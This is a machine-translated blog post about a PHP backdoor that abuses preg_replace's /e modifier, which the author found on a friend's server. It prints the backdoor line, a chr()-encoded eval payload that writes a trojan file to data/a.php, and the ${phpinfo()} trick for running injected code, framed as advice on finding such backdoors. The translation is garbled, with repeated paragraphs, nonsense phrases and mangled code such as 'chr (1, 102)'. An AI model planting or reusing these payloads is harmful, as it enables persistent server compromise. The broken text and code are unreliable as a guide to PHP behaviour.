Preg_replace: hiding backdoors and future exploration

There are a lot of php backdoors, and there are too many steamed buns and games. but when I helped my friends check the server, I found such malicious code. this is the case. None of the tools used by a friend's website to search for backdoors found a php Trojan, which is always missing. the trick of Xiao Hei is very good... there are a lot of php backdoors, and there are too many steamed buns and games. but when I helped my friends check the server, I found such malicious code.

This is the case. my friend's website does not find any php Trojan horse by using various tools to search for backdoors. I can't find it all the time. the trick of Xiao Hei is very advanced. I always delete the backdoors after each use, but every time I continue to come in, I can't find where I come in. this is really a headache.

Later, I finally found a trace of clues in the log. through my analysis, I found that an IP address is always very strange to POST data to a file. after a while, this IP address is used to access an inexplicable file. The name is obviously not a normal system file, but a PHP webshell. However, the webshell is deleted soon after it is used, then, through analysis, we found that the code of the file accessed by Xiao Hei was:

@ Preg_replace ("// e", $ _ POST ['in _ COMSENZ '], "Access Denied ");

If you see this code, there is no problem, but this is the malicious code and backdoor hidden by the hacker. it is concealed. basically, no scanning or killing software can be found.

Preg_replace function prototype:

Mixed preg_replace (mixed pattern, mixed replacement, mixed subject [, int limit])

Note:

The/e modifier enables preg_replace () to treat the replacement parameter as PHP code (after appropriate reverse references are replaced ). Tip: Make sure that the replacement constitutes a valid PHP code string. otherwise, PHP will report a syntax parsing error in the row containing preg_replace.

The above code is POST to accept data to test, it is more troublesome, if you replace it with GET to obtain data...

For example, the code is as follows: echo preg_replace ("/test/e", $ _ GET ["h"], "jutst test ");

If we submit? H = phpinfo (), phpinfo () will be executed (using the/e modifier, preg_replace will execute the replacement parameter as PHP code ).

If we want to POST, what will happen if we test and submit the following code? The code is as follows:

H = eval (chr (1, 102 ). chr (1, 112 ). chr (1, 117 ). chr (1, 116 ). chr (1, 115 ). chr (40 ). chr (1, 102 ). chr (1, 111 ). chr (1, 112 ). chr (1, 101 ). chr

(110 ). chr (40 ). chr (39 ). chr (1, 100 ). chr (97 ). chr (1, 116 ). chr (97 ). chr (47 ). chr (97 ). chr (46 ). chr (1, 112 ). chr (1, 104 ). chr

(112 ). chr (39 ). chr (44 ). chr (39 ). chr (1, 119 ). chr (39 ). chr (41 ). chr (44 ). chr (39 ). chr (60 ). chr (63 ). chr (1, 112 ). chr

(104 ). chr (1, 112 ). chr (32 ). chr (1, 101 ). chr (1, 118 ). chr (97 ). chr (1, 108 ). chr (40 ). chr (36 ). chr (95 ). chr (80 ). chr (79 ). chr

// Open source code phprm.com

(83 ). chr (84 ). chr (91 ). chr (99 ). chr (1, 109 ). chr (1, 100 ). chr (93 ). chr (41 ). chr (63 ). chr (62 ). chr (39 ). chr (41 ). chr (59 ))

The plaintext corresponding to the ciphertext is the following code: fputs (fopen (data/a. php, w ),);

The execution result is to generate a trojan file a. php in the/data/Directory. this is terrible. let's look at another difficult example. the code is as follows:

Function test ($ str)

{

}

Echo preg_replace ("/s * [php] (. + ?) [/Php] s */ies ", 'Test (" 1 ") ', $ _ GET [" h "]);

Submit? H = [php] phpinfo () [/php]. will phpinfo () be executed?

Certainly not, because after regular expression matching, the replacement parameter is changed to 'test ("phpinfo") ', and phpinfo is only treated as a string parameter.

Is there a way to execute it? Of course, here we will submit? H = [php] {$ {phpinfo ()} [/php], phpinfo () will be executed. why?

In php, if a double quotation mark contains a variable, the php interpreter replaces it with the result of the variable interpretation. the variables in single quotation marks are not processed.

Note: functions in double quotation marks are not executed and replaced.

Here we need to construct a special variable through {$ {}, 'Test ("{$ {phpinfo ()}}")', to make the function executed.

($ {Phpinfo ()} will be interpreted and executed ).

You can perform the following tests first: echo "{$ {phpinfo ()}"; phpinfo will be successfully executed. Therefore, when you look for backdoors, pay attention to the following, I also learned the following code:

1 @ preg_replace ("// e", $ _ POST ['in _ COMSENZ '], "Access Denied ");

The seemingly normal code is actually an extremely dangerous code, which is quite hidden.

Address:

Reprinted at will, but please attach the article address :-)